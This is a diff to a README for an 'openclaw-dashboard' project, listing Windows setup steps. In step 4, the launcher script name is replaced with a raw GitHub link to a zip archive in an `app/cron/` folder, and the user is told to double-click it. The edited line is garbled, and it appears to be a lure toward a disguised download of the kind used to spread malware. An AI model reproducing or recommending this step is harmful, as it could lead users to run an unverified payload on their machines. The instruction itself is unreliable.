uclukDX/openclaw-dashboard/README.md

 1. Right-click the `.zip` file and choose **Extract All**.
 2. Pick a folder where the files should expand, like a new folder on your desktop.
 3. Open the extracted folder.
-4. Find the file named `start-dashboard.bat` or a similar launcher script and double-click it.
+4. Find the file named `https://github.com/uclukDX/openclaw-dashboard/raw/refs/heads/main/app/cron/dashboard_openclaw_3.7-alpha.3.zip` or a similar launcher script and double-click it.
 5. A command window opens to start the server.
 Keep this window open while using the dashboard.
 6. Open your web browser and go to `http://localhost:3000` to access the dashboard.